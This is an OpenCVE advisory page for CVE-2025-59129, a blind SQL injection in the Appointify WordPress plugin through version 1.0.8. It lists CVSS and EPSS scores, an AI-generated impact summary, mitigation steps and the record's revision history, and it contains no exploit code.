Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through <= 1.0.8.
Published: 2025-12-30
Score: 7.6 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An improper neutralization of special elements in an SQL command has been identified in the Appointify WordPress plugin. This flaw allows a blind SQL injection, enabling an attacker to retrieve or manipulate data stored in the database by exploiting unsanitized input. The vulnerability is classified as CWE‑89 and can compromise the confidentiality, integrity, or availability of the site’s data.

Affected Systems

Affected users are WordPress site operators running the appointify plugin version 1.0.8 or earlier. The plugin is developed by appointify and deployed as a standard WordPress plugin on any site that has not applied the latest updates.

Risk and Exploitability

The CVSS score is 7.6, indicating a high severity level. The EPSS score is reported as less than 1 %, suggesting a low probability of exploitation at the time of analysis. The vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector is a web interface where untrusted input reaches an SQL query. Exploitation may be possible without authentication, but the details are not explicitly stated in the advisory. Monitoring for time‑based or error‑based SQL response patterns would help detect attempts.

Generated by OpenCVE AI on April 29, 2026 at 22:03 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Appointify plugin to a version newer than 1.0.8
  • Use database accounts with the least privileges necessary for the plugin to function
  • Implement input validation and parameterized queries in the plugin’s code if custom development is required

Generated by OpenCVE AI on April 29, 2026 at 22:03 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through 1.0.8. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through <= 1.0.8.
References
Metrics cvssV3_1

{'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}

Tue, 20 Jan 2026 15:30:00 +0000

Type Values Removed Values Added
References

Tue, 20 Jan 2026 14:45:00 +0000

Type Values Removed Values Added
References

Mon, 05 Jan 2026 10:45:00 +0000

Type Values Removed Values Added
First Time appeared Wordpress
Wordpress wordpress
Vendors & Products Wordpress
Wordpress wordpress

Tue, 30 Dec 2025 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 30 Dec 2025 17:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through 1.0.8.
Title WordPress Appointify plugin <= 1.0.8 - SQL Injection vulnerability
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:51.380Z

Reserved: 2025-09-09T14:47:17.696Z

Link: CVE-2025-59129

cve-icon Vulnrichment

Updated: 2025-12-30T17:58:46.900Z

cve-icon NVD

Status : Deferred

Published: 2025-12-30T17:15:42.397

Modified: 2026-06-17T09:45:35.377

Link: CVE-2025-59129

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-29T22:15:16Z

Weaknesses
  • CWE-89

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')